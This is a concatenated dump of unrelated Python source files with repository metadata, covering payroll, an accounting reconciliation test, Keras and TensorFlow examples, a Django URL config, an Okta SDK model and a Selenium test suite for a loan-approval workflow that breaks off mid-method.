depa=Departamento()
depa.departa()
pag=Pagos()
pag.pagoNormal()
pag.pagoExtra()
pag.calculoSueldo()
os.system ("cls")
emp.mostrarEmpresa()
print("")
emple.mostrarempleado()
print("")
pag.mostrarSueldo() | [
"85761855+Alopezm5@users.noreply.github.com"
] | 85761855+Alopezm5@users.noreply.github.com |
d301a9b536d8c15fbe982044f5825fcb03af8bef | 045cb1a5638c3575296f83471758dc09a8065725 | /addons/account/tests/test_bank_statement_reconciliation.py | dbc8598d569ec2a6d0d936c8488e90da9fc8d820 | [] | no_license | marionumza/saas | 7236842b0db98d1a0d0c3c88df32d268509629cb | 148dd95d991a348ebbaff9396759a7dd1fe6e101 | refs/heads/main | 2023-03-27T14:08:57.121601 | 2021-03-20T07:59:08 | 2021-03-20T07:59:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,056 | py | from harpiya.addons.account.tests.account_test_classes import AccountingTestCase
from harpiya.tests import tagged
@tagged('post_install', '-at_install')
class TestBankStatementReconciliation(AccountingTestCase):
def setUp(self):
super(TestBankStatementReconciliation, self).setUp()
self.bs_model = self.env['account.bank.statement']
self.bsl_model = self.env['account.bank.statement.line']
self.reconciliation_widget = self.env['account.reconciliation.widget']
self.partner = self.env['res.partner'].create({'name': 'test'})
self.currency_usd_id = self.env.ref("base.USD").id
self.currency_euro_id = self.env.ref("base.EUR").id
def test_reconciliation_proposition(self):
rcv_mv_line = self.create_invoice(100)
st_line = self.create_statement_line(100)
# exact amount match
rec_prop = self.reconciliation_widget.get_bank_statement_line_data(st_line.ids)['lines']
prop = rec_prop[0]['reconciliation_proposition']
self.assertEqual(len(prop), 1)
self.assertEqual(prop[0]['id'], rcv_mv_line.id)
def test_full_reconcile(self):
self._reconcile_invoice_with_statement('pay_val')
def test_post_at_bank_rec_full_reconcile(self):
""" Test the full reconciliation of a bank statement directly with an invoice.
"""
self._reconcile_invoice_with_statement('bank_rec')
def _reconcile_invoice_with_statement(self, post_at):
""" Tests the reconciliation of an invoice with a bank statement, using
the provided 'post at bank reconciliation' value for the bank journal
where to generate the statement.
"""
self.bs_model.with_context(journal_type='bank')._default_journal().post_at_bank_reconciliation = post_at == 'bank_rec'
rcv_mv_line = self.create_invoice(100)
st_line = self.create_statement_line(100)
# reconcile
st_line.process_reconciliation(counterpart_aml_dicts=[{
'move_line': rcv_mv_line,
'credit': 100,
'debit': 0,
'name': rcv_mv_line.name,
}])
# check everything went as expected
self.assertTrue(st_line.journal_entry_ids)
counterpart_mv_line = None
for l in st_line.journal_entry_ids:
if l.account_id.user_type_id.type == 'receivable':
counterpart_mv_line = l
break
self.assertIsNotNone(counterpart_mv_line)
self.assertTrue(rcv_mv_line.reconciled)
self.assertTrue(counterpart_mv_line.reconciled)
self.assertEqual(counterpart_mv_line.matched_credit_ids, rcv_mv_line.matched_debit_ids)
self.assertEqual(rcv_mv_line.move_id.invoice_payment_state, 'paid', "The related invoice's state should now be 'paid'")
def test_reconcile_with_write_off(self):
pass
def create_invoice(self, amount):
""" Return the move line that gets to be reconciled (the one in the receivable account) """
move = self.env['account.move'].create({
'type': 'out_invoice',
'partner_id': self.partner.id,
'invoice_line_ids': [(0, 0, {
'quantity': 1,
'price_unit': amount,
'name': 'test invoice',
})],
})
move.post()
return move.line_ids.filtered(lambda line: line.account_id.user_type_id.type in ('receivable', 'payable'))
def create_statement_line(self, st_line_amount):
journal = self.bs_model.with_context(journal_type='bank')._default_journal()
#journal = self.env.ref('l10n_be.bank_journal')
bank_stmt = self.bs_model.create({'journal_id': journal.id})
bank_stmt_line = self.bsl_model.create({
'name': '_',
'statement_id': bank_stmt.id,
'partner_id': self.partner.id,
'amount': st_line_amount,
})
return bank_stmt_line
def test_confirm_statement_usd(self):
company = self.env.ref('base.main_company')
self.cr.execute("UPDATE res_company SET currency_id = %s WHERE id = %s", [self.currency_euro_id, company.id])
self.env['res.currency.rate'].search([]).unlink()
self.env['res.currency.rate'].create({
'currency_id': self.currency_usd_id,
'rate': 2.0,
'name': '2001-01-01',
})
bank_journal_usd = self.env['account.journal'].create({
'name': 'Bank US',
'type': 'bank',
'code': 'BNK68',
'currency_id': self.currency_usd_id,
})
statement = self.bs_model.create({
'journal_id': bank_journal_usd.id,
'balance_end_real': 100,
'line_ids': [(0, 0, {
'name': '_',
'partner_id': self.partner.id,
'amount': 100,
'account_id': bank_journal_usd.default_debit_account_id.id,
})],
})
statement.button_open()
statement.button_confirm_bank()
| [
"yasir@harpiya.com"
] | yasir@harpiya.com |
640112112dfc01efccf5c8bd286908af5a23e0ef | 1cb0cc435061b6a0156b37813343ae46b1f7346e | /1_learn_step/try_second/normal-Adamax-128.py | bec42472cced5d42858f0b3fb5265b09bacb02eb | [] | no_license | youthliuxi/keras | 6370a9de11e152d8ba96e68e9ff02337203b7e66 | 60a367442f74313d0bd9af01f76068d56e23bec0 | refs/heads/master | 2020-04-30T19:54:16.628943 | 2019-08-21T09:47:13 | 2019-08-21T09:47:13 | 177,051,874 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,664 | py | # -*- coding:utf-8 -*-
from keras import backend as K
K.set_image_dim_ordering('th')
import numpy as np
np.random.seed(123)
from keras.layers import *
from keras.models import Sequential
from keras.utils import np_utils
from keras.datasets import mnist
# (X_train, y_train), (X_test, y_test) = mnist.load_data()
path = "./mnist.npz"
f = np.load(path)
X_train, y_train = f['x_train'],f['y_train']
X_test, y_test = f['x_test'],f['y_test']
X_train = X_train.reshape(X_train.shape[0], 1, 28, 28)
X_test = X_test.reshape(X_test.shape[0], 1, 28, 28)
import pylab
from matplotlib import pyplot as plt
X_train = X_train.reshape(X_train.shape[0], 1, 28, 28)
X_test = X_test.reshape(X_test.shape[0], 1, 28, 28)
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
X_train /= 255
X_test /= 255
Y_train = np_utils.to_categorical(y_train, 10)
Y_test = np_utils.to_categorical(y_test, 10)
model = Sequential()
model.add(Conv2D(32, (3, 3), activation='relu',init = 'normal', input_shape=(1,28,28)))
model.add(Conv2D(32, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(10, activation='softmax'))
model.compile(loss='categorical_crossentropy',optimizer='Adamax',metrics=['accuracy'])
hist = model.fit(X_train, Y_train, batch_size=128, nb_epoch=100, verbose=1, validation_data=(X_test, Y_test))
log_file_name = "try_second/txt/normal-Adamax-128.txt"
with open(log_file_name,'w') as f:
f.write(str(hist.history))
# score = model.evaluate(X_test, Y_test, verbose=0, batch_size=128)
# print(score[0])
# print(score[1])
| [
"lx_einstein@sina.com"
] | lx_einstein@sina.com |
e660605572d83e89f80cee2e458890e18cd8664f | 3c8701e04900389adb40a46daedb5205d479016c | /liaoxuefeng/05-面像对象编程/02-访问限制.py | fbe708c3a95ee8d4a9d9763f74054445db652382 | [] | no_license | huboa/xuexi | 681300653b834eaf506f49987dcca83df48e8db7 | 91287721f188b5e24fbb4ccd63b60a80ed7b9426 | refs/heads/master | 2020-07-29T16:39:12.770272 | 2018-09-02T05:39:45 | 2018-09-02T05:39:45 | 73,660,825 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 868 | py | class Student(object):
def __init__(self, name, score):
self.__name = name ###name 加上横线就变成了private 私有变量,只有内部可以访问,外部不能访问
self.__score = score
def print_score(self):
print('%s: %s' % (self.__name, self.__score))
def get_name(self): ###提供了新的方法供外部读取
return self.__name
def get_score(self):
return self.__score
def set_score(self, score): ###提供了新的方法供外部写入
if 0 <= score <= 100:
self.__score = score
else:
raise ValueError('bad score')
zsc=Student("赵胜冲",22)
bart = Student('Bart Simpson', 59)
print(zsc.get_name()) ####直接调用名字胡方法被限制,只能用get_name 获取了
###如果非要访问 可以直接
print(bart._Student__name)
| [
"wxcr11@gmail.com"
] | wxcr11@gmail.com |
a9207f2677a6c9f2a7e3870aea79ca983eafc2a6 | c22e1fe34211a62dd453946c226db06aab620368 | /mms/urls.py | 626838f8a01c482ca8afa51792694e9c72897a23 | [] | no_license | Mehedi-Bin-Hafiz/Hostel-management- | a45402fe591bb44e44a5a140c9aa8b0aa9fa5592 | 01cc0c0cb64c9cce444da8e1d4b664fa97cbf8de | refs/heads/master | 2022-03-04T02:16:56.893873 | 2019-10-05T11:58:49 | 2019-10-05T11:58:49 | 212,954,634 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,795 | py | """mms URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
import mealinput.views
import dailyexpense.views
import mealdashboard.views
import exdash.views
import index.views
import signup.views
import login.views
import manager.views
import userpro.views
import deposit.views
import depodash.views
urlpatterns = [
path('admin/', admin.site.urls),
path('',index.views.indexview,name="index"),
path('mealinput/', mealinput.views.mealinputformview, name="mealinput"),
path('expense/', dailyexpense.views.expenseformview, name="dailyexpense"),
path('deposit/', deposit.views.depositview, name="deposit"),
path('ddash/', depodash.views.depoview.as_view(), name="depodash"),
path('dashboard/', mealdashboard.views.mealview.as_view(), name="mealdashboard"),
path('edash/', exdash.views.exview.as_view(), name="exdash"),
path('signup/',signup.views.signupview,name="signup"),
path('login/',login.views.loginview,name="login"),
path('manager/',manager.views.managerview.as_view(),name='manager'),
path('userpro/',userpro.views.userproview.as_view(),name='userpro'),
path('logout/', index.views.logout, name="logout"),
]
| [
"mehedibinhafiz@gmail.com"
] | mehedibinhafiz@gmail.com |
652ee2326545c6f21803481114ec18c1a4f0726f | 7bb4954f798d295055607e1563269c2aeb10aca9 | /src/sample/tensorflow/list2/list2_1.py | ff895de22b34888156f367d15f226029f900a3e0 | [
"MIT"
] | permissive | mryyomutga/PDIII | 081aca58eb4159e3543e4e59cf1d8a4b8f84dbd1 | 2dc14e741349845bfe528c1dd06c434cf4414941 | refs/heads/master | 2020-03-08T17:56:51.845215 | 2019-02-15T01:16:53 | 2019-02-15T01:16:53 | 128,282,342 | 1 | 0 | null | 2018-12-22T15:11:29 | 2018-04-06T01:09:33 | Python | UTF-8 | Python | false | false | 369 | py | import tensorflow as tf
# constantは定数定義のAPI
# 単一の数字のテンソル
t1 = tf.constant(1, name="Rank0")
# 配列のテンソル
t2 = tf.constant([1, 2], name="Rank1")
# 多次元配列のテンソル
t3 = tf.constant([[1, 2], [3, 4]], name="Rank2")
with tf.Session() as sess:
print(sess.run(t1))
print(sess.run(t2))
print(sess.run(t3))
| [
"mryyomutga@gmail.com"
] | mryyomutga@gmail.com |
e2128c22737b078fb1161b9444fac63737b41c3a | 072077377f8c3181923ba84dc7b11e0a6d5afc2b | /vendors/okta/models/log_user_agent.py | c62996bcde78021e701321b423c904014c303a36 | [] | no_license | rafaelfoster/sophoscentral_okta_integration | c2a3ac472df6f2ac03770689f3c5213794f1e48e | d6170b700164ece51a831c27aee55bd498b94001 | refs/heads/master | 2023-02-15T11:30:40.195653 | 2021-01-07T21:32:35 | 2021-01-07T21:32:35 | 325,614,550 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,657 | py | # flake8: noqa
"""
Copyright 2020 - Present Okta, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# AUTO-GENERATED! DO NOT EDIT FILE DIRECTLY
# SEE CONTRIBUTOR DOCUMENTATION
from okta.okta_object import OktaObject
class LogUserAgent(
OktaObject
):
"""
A class for LogUserAgent objects.
"""
def __init__(self, config=None):
super().__init__(config)
if config:
self.browser = config["browser"]\
if "browser" in config else None
self.os = config["os"]\
if "os" in config else None
self.raw_user_agent = config["rawUserAgent"]\
if "rawUserAgent" in config else None
else:
self.browser = None
self.os = None
self.raw_user_agent = None
def request_format(self):
parent_req_format = super().request_format()
current_obj_format = {
"browser": self.browser,
"os": self.os,
"rawUserAgent": self.raw_user_agent
}
parent_req_format.update(current_obj_format)
return parent_req_format
| [
"rafaelgfoster@gmail.com"
] | rafaelgfoster@gmail.com |
8e495ea7490a463b054e66a65292e96eb033f824 | 074acb4439a97b76ea300b2c07d6a2457b04849f | /zombie/compat.py | 4cfeccdfa331e0ab2937545e840daf0fd2c336fe | [
"MIT"
] | permissive | graffic/python-zombie | 6d79ffb643034c27e84c18b697849d45eb901a06 | 7bfea60b3946d6b20dcc4f70896ffcfd4c55ac1f | refs/heads/master | 2021-01-20T21:57:11.314505 | 2013-08-04T15:12:01 | 2013-08-04T15:12:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 296 | py | import sys
# True if we are running on Python 3.
PY3 = sys.version_info[0] == 3
if PY3: # pragma: nocover
from io import BytesIO as StringIO
from urllib.parse import urlparse
else: # pragma: nocover
from urlparse import urlparse # noqa
from cStringIO import StringIO # noqa
| [
"lists@ryanpetrello.com"
] | lists@ryanpetrello.com |
267d7138ff4d9a19338307ad8f5304c7ad922e09 | 6d824eae55583dfabc130bbafb797e860914f10c | /.svn/pristine/12/12024d5e4dc490f0630c466d0c7c4d43fb47495e.svn-base | b95c9c1b6f602aedd6d36d3ad5b8c1d049dd93f2 | [] | no_license | sproutsbean/o2o | d97fd4840f983e4ff22746aaaeb1068f4c086755 | 2e2dbc35d756f5eda4232f0a737dcb3c074954e7 | refs/heads/master | 2021-05-05T19:23:20.733118 | 2018-01-17T03:30:25 | 2018-01-17T03:30:25 | 117,774,569 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25,754 | #!usr/bin/env python
# -*- coding:utf-8 -*-
"""
@author:user
@file: test_zhongduan_gongxiang.py
@time: 2017/12/11
"""
import unittest
from com.ea.common.cardname import cardname
from com.ea.common.cardnumber import IdCardNumber
from com.ea.common import login
from com.ea.resource import globalparameter as gl
from com.ea.common import menu
import time
from com.ea.common import tools
import os
import sys
class MyTestCase(unittest.TestCase):
u"""烟草贷自营模式"""
screenshot_path = os.path.join(gl.screenshot_path, os.path.splitext(os.path.basename(__file__))[0])
print(screenshot_path)
pic_path = gl.test_pic_path
cardNo = IdCardNumber.getRandomIdNumber(1)[0]
fullname, first_name, second_name, english_name = cardname.get_name()
phoneNo = cardname.createPhone()
loanno = ""
@classmethod
def setUpClass(cls):
cls.driver = tools.get_chrome_driver()
tools.del_pics(cls.screenshot_path)
login.login(cls.driver)
from com.ea.common.newzhengxin import NewZhengxin
cls.newzhengxin = NewZhengxin(cls.driver, cls.cardNo, cls.fullname, cls.first_name, cls.second_name,
cls.english_name, cls.phoneNo)
def setUp(self):
pass
def tearDown(self):
pass
@classmethod
def tearDownClass(cls):
cls.driver.quit()
# pass
def test_a_zhengxin_apply(self):
u"""创建征信"""
casename = sys._getframe().f_code.co_name
try:
self.newzhengxin.zhengxin_apply()
except Exception as e:
tools.get_screenshot(self.driver, self.screenshot_path, casename)
raise e
def test_b_zhengxin_approve(self):
u"""审批征信"""
casename = sys._getframe().f_code.co_name
try:
self.newzhengxin.zhengxin_approve()
except Exception as e:
tools.get_screenshot(self.driver, self.screenshot_path, casename)
raise e
def test_c_loan_apply(self):
u"""申请贷款"""
casename = sys._getframe().f_code.co_name
marray = "未婚"
loantype = "流通贷-烟草"
operator_mode = "自营模式"
loan_manager = "李"
loan_amount = "50000"
channel_name = "中国烟草"
operator_platform = "北京"
print("申请贷款开始")
# self.cardNo = "21020019741022267X"
print("采用的身份证号: " + self.cardNo)
from com.ea.pages.apply_loan_page import ApplyLoanPage
try:
menu.go_to_loan_apply(self.driver)
applyloanpage = ApplyLoanPage(self.driver)
applyloanpage.input_carno(self.cardNo)
applyloanpage.click_nextbutton()
applyloanpage.select_marry(marray)
applyloanpage.select_loantype(loantype)
applyloanpage.click_confirm_button()
applyloanpage.input_loanmanager(loan_manager)
applyloanpage.input_loanamount(loan_amount)
applyloanpage.select_managerment_mode(operator_mode)
applyloanpage.input_channel_name(channel_name)
applyloanpage.input_zy_operator_platform(operator_platform)
applyloanpage.click_savebutton()
applyloanpage.click_choose_zhengxin_button()
applyloanpage.click_afterzhengxin_savebutton()
applyloanpage.page_down()
applyloanpage.click_savebutton()
applyloanpage.click_commit_zhengxin_in()
MyTestCase.loanno = applyloanpage.get_loanno()
self.assertIsNotNone(self.loanno)
print("产生的贷款单号是:" + self.loanno)
print("申请贷款结束")
except Exception as e:
tools.get_screenshot(self.driver, self.screenshot_path, casename)
raise e
def test_d_loan_approve(self):
u"""贷款审批"""
casename = sys._getframe().f_code.co_name
number = "0"
view = "OK"
process_type = "征信准入"
except_result = "征信准入完成"
# self.loanno = "C380Z0067-BK-1712-00007"
print("审批贷款开始")
print("使用的贷款单号是:" + self.loanno)
from com.ea.pages.todo_page import TodoPage, ApproveLoanPage
try:
todopage = TodoPage(self.driver)
approvepage = ApproveLoanPage(self.driver)
# 进入待办查询页面
menu.go_to_wait_todo_query(self.driver)
todopage.input_yewuno(self.loanno)
todopage.click_query_all()
todopage.click_search_button()
todopage.click_first_row(process_type)
approvepage.scrollto_edit()
approvepage.click_edit()
approvepage.input_bank_overdue(number)
approvepage.input_credit_overdue(number)
approvepage.input_nobank_overdue(number)
approvepage.scrollto_save_button()
approvepage.click_save_button()
time.sleep(2)
approvepage.scrollto_approve_view()
approvepage.input_approve_view(view)
approvepage.click_tongguo()
approvepage.click_confirm()
time.sleep(3)
menu.go_to_loan_query(self.driver)
time.sleep(1)
actual_result = approvepage.get_result(self.loanno)
self.assertEqual(actual_result, except_result)
print("审批贷款结束")
except Exception as e:
tools.get_screenshot(self.driver, self.screenshot_path, casename)
raise e
def test_f_edit_inside_apply(self):
u"""启动内部审批"""
casename = sys._getframe().f_code.co_name
expect_result = "审核中"
organization = "公安局"
home_phone = "075528560115"
wechat = "123564456"
postcode = "518001"
province = "北京"
city = "东城区"
road = "无名路"
live_years = "5"
children_description = "这里是子女情况描述"
contact_names = ["张三", "李四"]
contact_phones = ["13625648852", "13525648853"]
relationship = "朋友"
total_price = "20"
mj_price = "1"
zhizhao_name = "YYZZ0001"
register_no = "1025110001"
organization_type = "个体工商户"
register_time = "2017-01-01"
shareholder_number = "1"
share_proportion = "100"
business_isnormal = "无"
borrower_iscontroler = "是"
controler_name = self.fullname
yingye_mode = "便利店"
vocation_type = "百货"
start_time = "2017-01-01"
jinglirun = "20"
fuzhaizonge = "10"
nianxiaoshoue = "50"
six_month_sales = "3"
personnel_number = "5"
month_pay = "20000"
water_pay = "1000"
other_pay = "500"
transport_pay = "1500"
capital = "100"
nianjinglirun = "20"
should_pay = "50"
collect = "60"
liabilities = "10"
invest = "10"
property_type = "租赁"
env_description = "这里是门店经营环境描述"
store_phone = "57629280"
store_date = "2017-01-01"
area = "20"
shoprent_year = "20000"
shoprent_starttime = "2017-01-01"
shoprent_endtime = "2017-05-05"
store_value = "500000"
new_old = "很新"
zhengqi = "整齐"
store_description = "这里是存货效期描述"
loan_time = "6个月"
huankuan_type = "等额本息"
loan_yongtu = "流动资金"
eamount = "50000"
bankname = "江西银行"
tuijian_type = "合作方推荐"
tuijian_name = "李超"
danbao_type = "其它方式"
# self.loanno = "C380Z0067-BK-1712-00007"
print("开始申请内部审批")
print("使用的贷款单号是:" + self.loanno)
try:
from com.ea.pages.inside_page import InsidePage
insidepage = InsidePage(self.driver)
menu.go_to_inside_approve(self.driver)
handle1 = self.driver.current_window_handle
insidepage.click_first_row(self.loanno)
handles = self.driver.window_handles
handle2 = ""
for handle in handles:
if handle != handle1:
self.driver.switch_to.window(handle)
handle2 = self.driver.current_window_handle
time.sleep(2)
insidepage.click_editinside_button()
handles = self.driver.window_handles
for handle in handles:
if handle != handle1 and handle != handle2:
self.driver.switch_to.window(handle)
# 借款人基本信息
insidepage.click_editborrower_button()
insidepage.input_card_organization(organization)
insidepage.input_home_phone(home_phone)
insidepage.input_wechat(wechat)
insidepage.input_postcode(postcode)
insidepage.select_register_addr_province(province)
time.sleep(1)
insidepage.select_register_addr_city(city)
insidepage.input_register_addr_road(road)
insidepage.select_sleep_addr_province(province)
time.sleep(1)
insidepage.select_sleep_addr_city(city)
insidepage.input_sleep_addr_road(road)
insidepage.input_live_years(live_years)
insidepage.input_children(children_description)
insidepage.click_borrower_save()
insidepage.click_borrower_confirm()
time.sleep(1)
# 添加紧急联系人
insidepage.scroll_to_contact()
for i in range(2):
insidepage.click_contact_add()
insidepage.input_contact_name(contact_names[i])
insidepage.input_contact_phone(contact_phones[i])
insidepage.select_contacts_relationship(relationship)
insidepage.click_contact_save()
time.sleep(2)
# 夫妻双方负债情况
insidepage.click_edit_fuzhai()
insidepage.input_total_price(total_price)
insidepage.input_mj_price(mj_price)
insidepage.click_fuzhai_save()
time.sleep(1)
# 经营主体信息
insidepage.scroll_to_jingyingzhuti_edit_button()
insidepage.click_jingyingzhuti_edit()
insidepage.input_yingyezhizhao_name(zhizhao_name)
insidepage.input_zhucehao(register_no)
insidepage.select_organization_type(organization_type)
insidepage.input_register_time(register_time)
insidepage.select_zhizhao_addr_province(province)
time.sleep(1)
insidepage.select_zhizhao_addr_city(city)
insidepage.input_zhizhao_addr_road(road)
insidepage.input_shareholder_number(shareholder_number)
insidepage.input_share_proportion(share_proportion)
insidepage.select_business_isnormal(business_isnormal)
insidepage.select_borrower_iscontroler(borrower_iscontroler)
insidepage.input_controler_name(controler_name)
insidepage.select_yingye_mode(yingye_mode)
insidepage.select_vocation_type(vocation_type)
insidepage.input_start_time(start_time)
insidepage.click_zhuti_submit_button()
time.sleep(3)
# 经营历史
insidepage.click_history_add()
insidepage.click_years()
insidepage.input_jingli(jinglirun)
insidepage.input_fuzhaizonge(fuzhaizonge)
insidepage.input_nianxiaoshoue(nianxiaoshoue)
insidepage.click_history_save_button()
time.sleep(2)
# 近6个月营业额情况
insidepage.click_six_month_edit()
insidepage.input_january(six_month_sales)
insidepage.input_february(six_month_sales)
insidepage.input_march(six_month_sales)
insidepage.input_april(six_month_sales)
insidepage.input_may(six_month_sales)
insidepage.input_june(six_month_sales)
insidepage.click_six_month_submit()
time.sleep(2)
# 编辑经营状况
insidepage.click_edit_status()
insidepage.input_personnel_number(personnel_number)
insidepage.input_month_pay(month_pay)
insidepage.input_water_pay(water_pay)
insidepage.input_other_pay(other_pay)
insidepage.input_transport_pay(transport_pay)
insidepage.input_capital(capital)
insidepage.input_nianjinglirun(nianjinglirun)
insidepage.click_bank_water()
insidepage.input_should_pay(should_pay)
insidepage.input_collect(collect)
insidepage.input_liabilities(liabilities)
insidepage.input_invest(invest)
insidepage.click_status_save_button()
time.sleep(2)
# 新增门店信息
insidepage.scroll_to_store()
insidepage.click_store_add_button()
insidepage.select_property_type(property_type)
insidepage.input_env_description(env_description)
insidepage.input_store_phone(store_phone)
insidepage.input_store_date(store_date)
insidepage.select_store_addr_province(province)
time.sleep(1)
insidepage.select_store_addr_city(city)
insidepage.input_store_addr_road(road)
insidepage.input_business_area(area)
insidepage.input_shoprent_year(shoprent_year)
insidepage.input_shoprent_starttime(shoprent_starttime)
insidepage.input_shoprent_endtime(shoprent_endtime)
insidepage.input_store_value(store_value)
insidepage.select_new_old(new_old)
insidepage.select_zhengqi(zhengqi)
insidepage.input_store_description(store_description)
insidepage.click_store_submit()
time.sleep(2)
# 编辑贷款信息
insidepage.scroll_to_loan_info()
time.sleep(1)
insidepage.select_loan_time(loan_time)
insidepage.select_huankuan_type(huankuan_type)
insidepage.input_eamount(eamount)
insidepage.select_loan_yongtu(loan_yongtu)
insidepage.select_loan_bankname(bankname)
insidepage.select_tuijian_type(tuijian_type)
insidepage.input_tuijian_name(tuijian_name)
insidepage.select_danbao_type(danbao_type)
insidepage.click_loan_info_save()
insidepage.click_loan_info_confirm()
self.driver.close()
# 切换到内审详情页面
self.driver.switch_to.window(handle2)
insidepage.click_submit_inside_approve()
time.sleep(1)
# 关闭内审详情页面
self.driver.close()
# 切换到内部审批页面
self.driver.switch_to.window(handle1)
# 刷新页面
self.driver.refresh()
actual_result = insidepage.get_result(self.loanno)
self.assertEqual(actual_result, expect_result)
print("申请内部审批结束")
except Exception as e:
tools.get_screenshot(self.driver, self.screenshot_path, casename)
raise e
def test_g_approve_inside(self):
u"""审批内部审批流程"""
casename = sys._getframe().f_code.co_name
expect_result = "结束"
process_type = "内部审批"
view = "OK"
print("开始审批内审流程")
print("使用的贷款单号是:" + self.loanno)
# self.loanno = "SK0027-BK-1712-00012"
from com.ea.pages.todo_page import TodoPage, ApproveInsidePage
todopage = TodoPage(self.driver)
approveinsidepage = ApproveInsidePage(self.driver)
# 进入待办查询页面
try:
menu.go_to_wait_todo_query(self.driver)
todopage.input_yewuno(self.loanno)
todopage.click_query_all()
todopage.click_search_button()
for i in range(4):
todopage.click_first_row(process_type)
approveinsidepage.scroll_to_approve_view()
approveinsidepage.input_approve_view(view)
approveinsidepage.click_tongguo_button()
approveinsidepage.click_confirm_button()
time.sleep(5)
# 切换到内部审批页面
menu.go_to_inside_approve(self.driver)
actual_result = approveinsidepage.get_result(self.loanno)
self.assertEqual(actual_result, expect_result)
print("审批内审流程结束")
except Exception as e:
tools.get_screenshot(self.driver, self.screenshot_path, casename)
raise e
def test_h_charge_apply(self):
u"""启动收费流程"""
casename = sys._getframe().f_code.co_name
expect_result = "审核中"
# self.loanno = "SK0027-BK-1712-00012"
print("启动收费流程开始")
print("使用的贷款单号是:" + self.loanno)
try:
from com.ea.pages.charge_page import ChargePage
chargepage = ChargePage(self.driver)
menu.go_to_charge_query(self.driver)
chargepage.click_loan_no(self.loanno)
chargepage.click_start_flow()
time.sleep(2)
actual_result = chargepage.get_result(self.loanno)
self.assertEqual(actual_result, expect_result)
print("启动收费流程结束")
except Exception as e:
tools.get_screenshot(self.driver, self.screenshot_path, casename)
raise e
def test_i_charge_approve(self):
u"""审批收费流程"""
casename = sys._getframe().f_code.co_name
expect_result = "流程结束"
process_type = "保证金管理费"
pay_time = "2017-10-10"
approve_view = "OK"
daokuan_total = "50000"
pay_date = "2017-10-10"
# self.loanno = "SK0027-BK-1712-00012"
print("审批收费流程开始")
print("使用的贷款单号是:" + self.loanno)
try:
from com.ea.pages.todo_page import TodoPage, ApproveCharge
todopage = TodoPage(self.driver)
approvechaegepage = ApproveCharge(self.driver)
# 进入待办查询页面
menu.go_to_wait_todo_query(self.driver)
todopage.input_yewuno(self.loanno)
todopage.click_query_all()
todopage.click_search_button()
todopage.click_first_row(process_type)
approvechaegepage.scroll_to_payer()
approvechaegepage.input_payer(self.fullname)
approvechaegepage.input_pay_time(pay_time)
approvechaegepage.click_save_button()
time.sleep(1)
approvechaegepage.scroll_to_approve_view()
time.sleep(3)
approvechaegepage.input_print_voucher(self.pic_path)
time.sleep(1)
approvechaegepage.input_approve_view(approve_view)
approvechaegepage.click_tongguo_button()
approvechaegepage.click_confirm_button()
time.sleep(5)
todopage.click_first_row(process_type)
approvechaegepage.scroll_to_daokuan_total()
time.sleep(1)
approvechaegepage.input_daokuan_total(daokuan_total)
approvechaegepage.input_pay_date(pay_date)
approvechaegepage.select_collect_acount(1)
approvechaegepage.click_save_button()
approvechaegepage.scroll_to_approve_view()
approvechaegepage.input_approve_view(approve_view)
approvechaegepage.click_tongguo_button()
approvechaegepage.click_confirm_button()
time.sleep(5)
menu.go_to_charge_query(self.driver)
actual_result = approvechaegepage.get_result(self.loanno)
self.assertEqual(actual_result, expect_result)
print("审批收费流程结束")
except Exception as e:
tools.get_screenshot(self.driver, self.screenshot_path, casename)
raise e
def test_j_interview_apply(self):
u"""面签提报"""
casename = sys._getframe().f_code.co_name
expect_result = "审核中"
jiekuanhetong_flag = "是"
# self.loanno = "SK0027-BK-1712-00012"
print("申请面签提报开始")
print("使用的贷款单号是:" + self.loanno)
try:
from com.ea.pages.interview_page import InterviewPage
interviewpage = InterviewPage(self.driver)
# 进入到面签提报页面
menu.go_to_interview_report(self.driver)
handle1 = self.driver.current_window_handle
interviewpage.click_loan_no(self.loanno)
handles = self.driver.window_handles
for handle in handles:
if handle != handle1:
self.driver.switch_to.window(handle)
time.sleep(1)
interviewpage.click_edit_interview_button()
interviewpage.select_jiekuanhetong(jiekuanhetong_flag)
interviewpage.click_save_button()
interviewpage.click_confirm_button()
time.sleep(1)
interviewpage.input_file(self.pic_path)
time.sleep(1)
interviewpage.click_close_button()
time.sleep(1)
interviewpage.click_interview_submit()
# 关闭申报详情页面
self.driver.close()
# 切换到内部审批页面
self.driver.switch_to.window(handle1)
# 刷新页面
self.driver.refresh()
actual_result = interviewpage.get_result(self.loanno)
self.assertEqual(actual_result, expect_result)
print("申请面签提报结束")
except Exception as e:
tools.get_screenshot(self.driver, self.screenshot_path, casename)
raise e
def test_k_interview_approve(self):
u"""面签审批"""
casename = sys._getframe().f_code.co_name
expect_result = "已放款"
types = "面签提报"
card_daoqi_date = "2028-10-10"
approve_view = "OK"
isphonecheck = "是"
phonecheckmessage = "OK"
isfujianover = "是"
file_path = gl.file_path
# self.loanno = "SK0027-BK-1712-00012"
print("面签审批开始")
print("使用的贷款单号是:" + self.loanno)
try:
from com.ea.pages.todo_page import TodoPage, ApproveInterview
todopage = TodoPage(self.driver)
approveinterviepage = ApproveInterview(self.driver)
menu.go_to_wait_todo_query(self.driver)
